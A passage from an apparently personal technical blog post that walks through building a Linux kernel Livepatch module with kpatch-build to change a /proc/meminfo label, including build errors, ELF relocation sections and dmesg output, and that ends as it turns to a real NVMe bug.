<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"AnonPages: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_ANON_MAPPED</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Mapped: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_FILE_MAPPED</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Shmem: "</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">sharedram</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"KReclaimable: "</span><span class="p">,</span> <span class="n">sreclaimable</span> <span class="o">+</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_KERNEL_MISC_RECLAIMABLE</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Slab: "</span><span class="p">,</span> <span class="n">sreclaimable</span> <span class="o">+</span> <span class="n">sunreclaim</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"SReclaimable: "</span><span class="p">,</span> <span class="n">sreclaimable</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"SUnreclaim: "</span><span class="p">,</span> <span class="n">sunreclaim</span><span class="p">);</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"KernelStack: %8lu kB</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
<span class="n">global_zone_page_state</span><span class="p">(</span><span class="n">NR_KERNEL_STACK_KB</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"PageTables: "</span><span class="p">,</span>
<span class="n">global_zone_page_state</span><span class="p">(</span><span class="n">NR_PAGETABLE</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"NFS_Unstable: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_UNSTABLE_NFS</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Bounce: "</span><span class="p">,</span>
<span class="n">global_zone_page_state</span><span class="p">(</span><span class="n">NR_BOUNCE</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"WritebackTmp: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_WRITEBACK_TEMP</span><span class="p">));</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"CommitLimit: "</span><span class="p">,</span> <span class="n">vm_commit_limit</span><span class="p">());</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Committed_AS: "</span><span class="p">,</span> <span class="n">committed</span><span class="p">);</span>
<span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"VmallocTotal: %8lu kB</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
<span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span><span class="n">VMALLOC_TOTAL</span> <span class="o">>></span> <span class="mi">10</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"VmallocUsed: "</span><span class="p">,</span> <span class="n">vmalloc_nr_pages</span><span class="p">());</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"VMALLOCCHUNK: "</span><span class="p">,</span> <span class="mi">0ul</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"Percpu: "</span><span class="p">,</span> <span class="n">pcpu_nr_pages</span><span class="p">());</span>
<span class="cp">#ifdef CONFIG_MEMORY_FAILURE
</span> <span class="n">seq_printf</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"HardwareCorrupted: %5lu kB</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
<span class="n">atomic_long_read</span><span class="p">(</span><span class="o">&</span><span class="n">num_poisoned_pages</span><span class="p">)</span> <span class="o"><<</span> <span class="p">(</span><span class="n">PAGE_SHIFT</span> <span class="o">-</span> <span class="mi">10</span><span class="p">));</span>
<span class="cp">#endif
</span>
<span class="cp">#ifdef CONFIG_TRANSPARENT_HUGEPAGE
</span> <span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"AnonHugePages: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_ANON_THPS</span><span class="p">)</span> <span class="o">*</span> <span class="n">HPAGE_PMD_NR</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"ShmemHugePages: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_SHMEM_THPS</span><span class="p">)</span> <span class="o">*</span> <span class="n">HPAGE_PMD_NR</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"ShmemPmdMapped: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_SHMEM_PMDMAPPED</span><span class="p">)</span> <span class="o">*</span> <span class="n">HPAGE_PMD_NR</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"FileHugePages: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_FILE_THPS</span><span class="p">)</span> <span class="o">*</span> <span class="n">HPAGE_PMD_NR</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"FilePmdMapped: "</span><span class="p">,</span>
<span class="n">global_node_page_state</span><span class="p">(</span><span class="n">NR_FILE_PMDMAPPED</span><span class="p">)</span> <span class="o">*</span> <span class="n">HPAGE_PMD_NR</span><span class="p">);</span>
<span class="cp">#endif
</span>
<span class="cp">#ifdef CONFIG_CMA
</span> <span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"CmaTotal: "</span><span class="p">,</span> <span class="n">totalcma_pages</span><span class="p">);</span>
<span class="n">show_val_kb</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">"CmaFree: "</span><span class="p">,</span>
<span class="n">global_zone_page_state</span><span class="p">(</span><span class="n">NR_FREE_CMA_PAGES</span><span class="p">));</span>
<span class="cp">#endif
</span>
<span class="n">hugetlb_report_meminfo</span><span class="p">(</span><span class="n">m</span><span class="p">);</span>
<span class="n">arch_report_meminfo</span><span class="p">(</span><span class="n">m</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_func</span> <span class="n">funcs</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">{</span>
<span class="p">.</span><span class="n">old_name</span> <span class="o">=</span> <span class="s">"meminfo_proc_show"</span><span class="p">,</span>
<span class="p">.</span><span class="n">new_func</span> <span class="o">=</span> <span class="n">livepatch_meminfo_proc_show</span><span class="p">,</span>
<span class="p">},</span> <span class="p">{</span> <span class="p">}</span>
<span class="p">};</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_object</span> <span class="n">objs</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">{</span>
<span class="cm">/* name being NULL means vmlinux */</span>
<span class="p">.</span><span class="n">funcs</span> <span class="o">=</span> <span class="n">funcs</span><span class="p">,</span>
<span class="p">},</span> <span class="p">{</span> <span class="p">}</span>
<span class="p">};</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_patch</span> <span class="n">patch</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">mod</span> <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">.</span><span class="n">objs</span> <span class="o">=</span> <span class="n">objs</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">livepatch_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">klp_enable_patch</span><span class="p">(</span><span class="o">&</span><span class="n">patch</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">livepatch_exit</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="n">module_init</span><span class="p">(</span><span class="n">livepatch_init</span><span class="p">);</span>
<span class="n">module_exit</span><span class="p">(</span><span class="n">livepatch_exit</span><span class="p">);</span>
<span class="n">MODULE_LICENSE</span><span class="p">(</span><span class="s">"GPL"</span><span class="p">);</span>
<span class="n">MODULE_INFO</span><span class="p">(</span><span class="n">livepatch</span><span class="p">,</span> <span class="s">"Y"</span><span class="p">);</span>
</code></pre></div></div>
<p>We can pretty much keep the same <code class="language-plaintext highlighter-rouge">Makefile</code> as last time:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m := livepatch-meminfo.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
$(MAKE) -C $(KDIR) M=$(PWD) clean
</code></pre></div></div>
<p>When we build, we see some unresolved symbols:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>make
make <span class="nt">-C</span> /lib/modules/5.4.0-21-generic/build <span class="nv">M</span><span class="o">=</span>/home/ubuntu/meminfo modules
make[1]: Entering directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
CC <span class="o">[</span>M] /home/ubuntu/meminfo/livepatch-meminfo.o
/home/ubuntu/meminfo/livepatch-meminfo.c: In <span class="k">function</span> ‘livepatch_meminfo_proc_show’:
/home/ubuntu/meminfo/livepatch-meminfo.c:19:9: error: implicit declaration of <span class="k">function</span> ‘si_swapinfo’ <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
19 | si_swapinfo<span class="o">(</span>&i<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:20:51: error: ‘vm_committed_as’ undeclared <span class="o">(</span>first use <span class="k">in </span>this <span class="k">function</span><span class="o">)</span>
20 | committed <span class="o">=</span> percpu_counter_read_positive<span class="o">(</span>&vm_committed_as<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:20:51: note: each undeclared identifier is reported only once <span class="k">for </span>each <span class="k">function </span>it appears <span class="k">in</span>
/home/ubuntu/meminfo/livepatch-meminfo.c:23:25: error: implicit declaration of <span class="k">function</span> ‘total_swapcache_pages’ <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
23 | total_swapcache_pages<span class="o">()</span> - i.bufferram<span class="p">;</span>
| ^~~~~~~~~~~~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:34:9: error: implicit declaration of <span class="k">function</span> ‘show_val_kb’ <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
34 | show_val_kb<span class="o">(</span>m, <span class="s2">"MemTotal: "</span>, i.totalram<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:90:44: error: implicit declaration of <span class="k">function</span> ‘vm_commit_limit’ <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
90 | show_val_kb<span class="o">(</span>m, <span class="s2">"CommitLimit: "</span>, vm_commit_limit<span class="o">())</span><span class="p">;</span>
| ^~~~~~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:117:44: error: ‘totalcma_pages’ undeclared <span class="o">(</span>first use <span class="k">in </span>this <span class="k">function</span><span class="o">)</span><span class="p">;</span> did you mean ‘totalram_pages’?
117 | show_val_kb<span class="o">(</span>m, <span class="s2">"CmaTotal: "</span>, totalcma_pages<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~~~~
| totalram_pages
/home/ubuntu/meminfo/livepatch-meminfo.c:122:9: error: implicit declaration of <span class="k">function</span> ‘hugetlb_report_meminfo’<span class="p">;</span> did you mean ‘arch_report_meminfo’? <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
122 | hugetlb_report_meminfo<span class="o">(</span>m<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~~~~~~~~~~~~
| arch_report_meminfo
cc1: some warnings being treated as errors
make[2]: <span class="k">***</span> <span class="o">[</span>scripts/Makefile.build:275: /home/ubuntu/meminfo/livepatch-meminfo.o] Error 1
make[1]: <span class="k">***</span> <span class="o">[</span>Makefile:1719: /home/ubuntu/meminfo] Error 2
make[1]: Leaving directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
make: <span class="k">***</span> <span class="o">[</span>Makefile:5: default] Error 2
</code></pre></div></div>
<p>Not to worry! We are just missing some header files. Look at the symbols and use
cscope to find what header files they live in, and <code class="language-plaintext highlighter-rouge">#include</code> them:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <linux/seq_file.h>
#include <linux/swap.h>
#include <linux/mman.h>
#include <linux/cma.h>
#include <linux/hugetlb.h>
</span></code></pre></div></div>
<p>Now lets build:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>make
make <span class="nt">-C</span> /lib/modules/5.4.0-21-generic/build <span class="nv">M</span><span class="o">=</span>/home/ubuntu/meminfo modules
make[1]: Entering directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
CC <span class="o">[</span>M] /home/ubuntu/meminfo/livepatch-meminfo.o
/home/ubuntu/meminfo/livepatch-meminfo.c: In <span class="k">function</span> ‘livepatch_meminfo_proc_show’:
/home/ubuntu/meminfo/livepatch-meminfo.c:38:9: error: implicit declaration of <span class="k">function</span> ‘show_val_kb’ <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
38 | show_val_kb<span class="o">(</span>m, <span class="s2">"MemTotal: "</span>, i.totalram<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~
cc1: some warnings being treated as errors
make[2]: <span class="k">***</span> <span class="o">[</span>scripts/Makefile.build:275: /home/ubuntu/meminfo/livepatch-meminfo.o] Error 1
make[1]: <span class="k">***</span> <span class="o">[</span>Makefile:1719: /home/ubuntu/meminfo] Error 2
make[1]: Leaving directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
make: <span class="k">***</span> <span class="o">[</span>Makefile:5: default] Error 2
</code></pre></div></div>
<p>Unfortunately for us, this basic example calls <code class="language-plaintext highlighter-rouge">show_val_kb()</code>. This isn’t
defined in any header files, and is actually local to <code class="language-plaintext highlighter-rouge">fs/proc/meminfo.c</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">show_val_kb</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">num</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">seq_put_decimal_ull_width</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="n">num</span> <span class="o"><<</span> <span class="p">(</span><span class="n">PAGE_SHIFT</span> <span class="o">-</span> <span class="mi">10</span><span class="p">),</span> <span class="mi">8</span><span class="p">);</span>
<span class="n">seq_write</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">" kB</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>So close but so far! Now, these functions which are local to their modules don’t
actually export their symbols to a stripped vmlinuz, which means we have a
problem. Even if we try be cheeky and make a forward declaration and label it
<code class="language-plaintext highlighter-rouge">extern</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">extern</span> <span class="kt">void</span> <span class="nf">show_val_kb</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">num</span><span class="p">);</span>
</code></pre></div></div>
<p>The compiler is onto us!</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>make
make <span class="nt">-C</span> /lib/modules/5.4.0-21-generic/build <span class="nv">M</span><span class="o">=</span>/home/ubuntu/meminfo modules
make[1]: Entering directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
CC <span class="o">[</span>M] /home/ubuntu/meminfo/livepatch-meminfo.o
Building modules, stage 2.
MODPOST 1 modules
ERROR: <span class="s2">"arch_report_meminfo"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"hugetlb_report_meminfo"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"totalcma_pages"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"num_poisoned_pages"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"pcpu_nr_pages"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"vmalloc_nr_pages"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"vm_commit_limit"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"show_val_kb"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"total_swapcache_pages"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"vm_committed_as"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"si_swapinfo"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
make[2]: <span class="k">***</span> <span class="o">[</span>scripts/Makefile.modpost:94: __modpost] Error 1
make[1]: <span class="k">***</span> <span class="o">[</span>Makefile:1632: modules] Error 2
make[1]: Leaving directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
make: <span class="k">***</span> <span class="o">[</span>Makefile:5: default] Error 2
</code></pre></div></div>
<p>While the module object builds, it cannot be linked, since the compiler does not
know the offsets or locations of the functions which reside in the unstripped
vmlinux / stripped vmlinuz binaries.</p>
<p>So, how do we fix this? I struggled with this issue for quite a long time, until
I went back and read the Livepatch documentation more closely.</p>
<p>From <a href="https://www.kernel.org/doc/Documentation/livepatch/livepatch.txt">Documentation/livepatch/livepatch.txt</a>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>The patch contains only functions that are really modified. But they
might want to access functions or data from the original source file
that may only be locally accessible. This can be solved by a special
relocation section in the generated livepatch module, see
Documentation/livepatch/module-elf-format.txt for more details.
</code></pre></div></div>
<p>If you go ahead and read <a href="https://www.kernel.org/doc/Documentation/livepatch/module-elf-format.txt">Documentation/livepatch/module-elf-format.txt</a>,
we find that we need to add ELF sections to the object file which tell the
kernel Livepatch subsystem how to apply relocations for each of these functions
into the kernel we are targeting.</p>
<p>There are two ELF sections that need adding;</p>
<ul>
<li>SHF_RELA_LIVEPATCH</li>
<li>SHN_LIVEPATCH</li>
</ul>
<p>SHF_RELA_LIVEPATCH is used to declare the functions which need to be redirected
with ftrace, that is, the functions that are actually being Livepatched.</p>
<p>SHN_LIVEPATCH are all the local symbols that the fixed function calls, and need
to be fixed up.</p>
<p>Each section needs entries of the from:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.klp.rela.objname.section_name
</code></pre></div></div>
<p>An example for <code class="language-plaintext highlighter-rouge">SHF_RELA_LIVEPATCH</code> would be:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.klp.rela.vmlinux.text.meminfo.proc_show
</code></pre></div></div>
<p>These ELF sections need to know the addresses and offsets from the vmlinux
binary.</p>
<p>Now, inserting these by hand is actually really hard, and does not scale at all.</p>
<p>This is the idea behind <code class="language-plaintext highlighter-rouge">kpatch-build</code>, and automated build program which can
generate Livepatches from source diffs, and programatically fetch and insert
these ELF sections which contain the symbol relocation tables.</p>
<h3 id="using-kpatch-build-to-generate-the-livepatch">Using kpatch-build to Generate the Livepatch</h3>
<p>Firstly we need to download and build kpatch-build:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install dpkg-dev devscripts elfutils ccache
$ sudo apt build-dep linux
$ git clone https://github.com/dynup/kpatch.git
$ cd kpatch
$ make
</code></pre></div></div>
<p>The next step is to download the <code class="language-plaintext highlighter-rouge">ddeb</code> (debug-deb) package for the kernel we
wish to make a Livepatch module for. A list of all kernel ddeb packages can
be found <a href="http://ddebs.ubuntu.com/ubuntu/pool/main/l/linux/">at the ddeb package repository</a>.</p>
<p>I will be targeting 5.4.0-24-generic, so I need to download
<a href="http://ddebs.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb">linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ wget http://ddebs.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb
$ sudo dpkg -i linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb
</code></pre></div></div>
<p>The resulting debug vmlinux will be placed at <code class="language-plaintext highlighter-rouge">/lib/debug/boot/vmlinux-5.4.0-24-generic</code>.</p>
<p><code class="language-plaintext highlighter-rouge">kpatch-build</code> operates on source diffs. Save the diff to <code class="language-plaintext highlighter-rouge">~/meminfo-string.patch</code>
like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cat ~/meminfo-string.patch
diff --git a/fs/proc/meminfo.c b/fs/proc/meminfo.c
index 8c1f1bb1a5ce..3053c1bce50d 100644
--- a/fs/proc/meminfo.c
+++ b/fs/proc/meminfo.c
@@ -117,7 +117,7 @@ static int meminfo_proc_show(struct seq_file *m, void *v)
seq_printf(m, "VmallocTotal: %8lu kB\n",
(unsigned long)VMALLOC_TOTAL >> 10);
show_val_kb(m, "VmallocUsed: ", vmalloc_nr_pages());
- show_val_kb(m, "VmallocChunk: ", 0ul);
+ show_val_kb(m, "VMALLOCCHUNK: ", 0ul);
show_val_kb(m, "Percpu: ", pcpu_nr_pages());
#ifdef CONFIG_MEMORY_FAILURE
</code></pre></div></div>
<p>Now we are ready to build!</p>
<p>Run the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ kpatch/kpatch-build/kpatch-build -t vmlinux --vmlinux /lib/debug/boot/vmlinux-5.4.0-24-generic ~/meminfo-string.patch
Using cache at /home/matthew/.kpatch/src
Testing patch file(s)
Reading special section data
readelf: Error: LEB value too large
readelf: Error: LEB value too large
Building original source
Building patched source
Extracting new and modified ELF sections
meminfo.o: changed function: meminfo_proc_show
Patched objects: vmlinux
Building patch module: livepatch-meminfo-string.ko
SUCCESS
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">kpatch-build</code> works by first downloading the source archive of the kernel you
are targeting, which is determined by the vmlinux package you pass in.
From there, the standard vmlinux is built normally. Once that completes, the
source tree is patched with the patch you specified, and rebuilt. Since most
patches are small, only changed object files are rebuilt. In this case, only
<code class="language-plaintext highlighter-rouge">meminfo.o</code> gets rebuilt.</p>
<p>Since we now know that only <code class="language-plaintext highlighter-rouge">meminfo.o</code> got changed, the single object is
compiled again with <code class="language-plaintext highlighter-rouge">-ffunction-sections -fdata-sections</code> in both the patched
and unpatched forms.</p>
<p>Then each unpatched and patched object set is then analysed by
<code class="language-plaintext highlighter-rouge">create-diff-object</code> to determine what functions have been modified, and to
extract the changed functions. This program also checks for Livepatch compatibility.</p>
<p>The really special part of <code class="language-plaintext highlighter-rouge">create-diff-object</code> is that it creates the necessary
ELF symbol relocation sections to the patched objectfile.</p>
<p>It adds <code class="language-plaintext highlighter-rouge">kpatch.funcs</code> and <code class="language-plaintext highlighter-rouge">.rela.kpatch.funcs</code> which tell ftrace what functions
are actually going to be Livepatched.</p>
<p>It adds <code class="language-plaintext highlighter-rouge">.kpatch.dynrelas</code> and <code class="language-plaintext highlighter-rouge">.rela.kpatch.dynrelas</code> which are used to fixup
symbol relocations for local function calls in the fixed function to symbols
in vmlinux.</p>
<p>From there, <code class="language-plaintext highlighter-rouge">kpatch-build</code> generates a new kernel module containing all
Livepatches, which is ready to be used.</p>
<p>Let’s test it out shall we?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo insmod livepatch-meminfo-string.ko
$ grep -i chunk /proc/meminfo
VMALLOCCHUNK: 0 kB
</code></pre></div></div>
<p>It worked! Great! Let’s see what <code class="language-plaintext highlighter-rouge">dmesg</code> has to say:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 5611.674220] livepatch_meminfo_string: loading out-of-tree module taints kernel.
[ 5611.674223] livepatch_meminfo_string: tainting kernel with TAINT_LIVEPATCH
[ 5611.674259] livepatch_meminfo_string: module verification failed: signature and/or required key missing - tainting kernel
[ 5611.856109] livepatch: enabling patch 'livepatch_meminfo_string'
[ 5611.859603] livepatch: 'livepatch_meminfo_string': starting patching transition
[ 5611.860277] livepatch: 'livepatch_meminfo_string': patching complete
</code></pre></div></div>
<p>Pretty much the same as last time.</p>
<p>As for those ELF sections, we can examine the kernel module to see them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ readelf --sections livepatch-meminfo-string.ko
There are 52 section headers, starting at offset 0xac7e8:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
...
[20] .kpatch.funcs PROGBITS 0000000000000000 00001fa8
0000000000000038 0000000000000000 A 0 0 8
[21] .rela.kpatch.func RELA 0000000000000000 00001fe0
0000000000000048 0000000000000018 I 48 20 8
...
[51] .klp.rela.vmlinux RELA 0000000000000000 000ac308
00000000000004e0 0000000000000018 AIo 48 10 8
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ readelf --relocs livepatch-meminfo-string.ko
...
Relocation section '.klp.rela.vmlinux..text.meminfo_proc_show' at offset 0xac308 contains 52 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000000003f 005400000004 R_X86_64_PLT32 0000000000000000 .klp.sym.vmlinux.si_sw - 4
000000000046 005500000002 R_X86_64_PC32 0000000000000000 .klp.sym.vmlinux.vm_co + 4
...
</code></pre></div></div>
<h1 id="using-livepatch-to-fix-a-real-bug">Using Livepatch to Fix A Real Bug</h1>
<p>Now, I really wanted to make a Livepatch to fix a real bug, but for the moment
I must admit defeat.</p>
<p>I went into writing this blog post thinking that Livepatch could be an awesome
tool to help fix customer issues, but the problem is, there are some severe
limitations as to what can be Livepatched, and even when you believe a patch
could be compatible, a GCC optimisation could completely ruin your plans.</p>
<p>I have two examples.</p>
<h2 id="example-one-inline-functions">Example One: Inline Functions</h2>
<p>The first, is a bug that was actually a regression to the SRU I made for the
bug fixed by my previous blog post,
<a href="https://ruffell.nz/programming/writeups/2019/07/20/resolving-nvme-performance-degradation.html">Resolving Large NVMe Performance Degradation in the Ubuntu 4.4 Kernel</a>.</p>
<p>Anyway, the bug is documented by my colleague who I worked the case with:</p>
<p><a href="https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1869229">Mounting LVM snapshots with xfs can hit kernel BUG in nvme driver</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit 5a8d75a1b8c99bdc926ba69b7b7dbe4fae81a5af
Author: Ming Lei <ming.lei@redhat.com>
Date: Fri Apr 14 13:58:29 2017 -0600
Subject: block: fix bio_will_gap() for first bvec with offset
</code></pre></div></div>
<p>You can read the commit here:
